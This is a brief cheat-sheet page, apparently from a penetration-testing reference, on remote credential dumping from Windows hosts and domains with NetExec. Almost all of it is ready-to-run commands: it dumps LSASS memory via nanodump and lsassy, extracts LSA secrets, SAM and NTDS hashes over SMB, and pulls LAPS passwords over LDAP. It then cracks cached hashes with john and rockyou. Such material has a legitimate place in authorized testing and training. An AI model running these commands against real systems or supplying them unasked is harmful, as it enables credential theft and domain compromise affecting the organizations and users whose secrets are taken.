← Back to search

Remote Credential Dumping with NetExec

credentialswindowstool

Summary

Use NetExec/nxc to remotely dump LSASS, SAM, LSA, NTDS, and LAPS credentials over SMB/LDAP with admin creds, then crack the recovered hashes.

Walkthrough

NetExec (nxc) remotely extracts credentials from a Windows host or domain when you already hold admin credentials.

Steps

  1. Dump LSASS memory remotely with the nanodump or lsassy modules (-M).
  2. Pull stored secrets with --lsa (LSA secrets), --sam (local hashes), and --ntds (domain hashes from a DC).
  3. Retrieve LAPS passwords over LDAP with --laps or -M laps.
  4. If creds fail against a standalone host, retry with --local-auth.
  5. Crack what you recover: cached (LSA/mscash2) hashes with john (--format=mscash2); look up NTLM hashes on ntlm.pw.

Commands

bash

netexec smb <TARGET> -u 'admin' -p '<PASS>' -M nanodump
netexec smb <TARGET> -u 'admin' -p '<PASS>' -M lsassy

bash

netexec smb <TARGET> -u 'admin' -p '<PASS>' --lsa
netexec smb <TARGET> -u 'admin' -p '<PASS>' --sam
netexec smb <TARGET> -u 'admin' -p '<PASS>' --ntds

bash

nxc ldap <IP> -u <USER> -p '<PASS>' --laps
nxc ldap <IP> -u <USER> -p '<PASS>' -M laps

bash

john --wordlist=/usr/share/wordlists/rockyou.txt --format=mscash2 mscash_hashes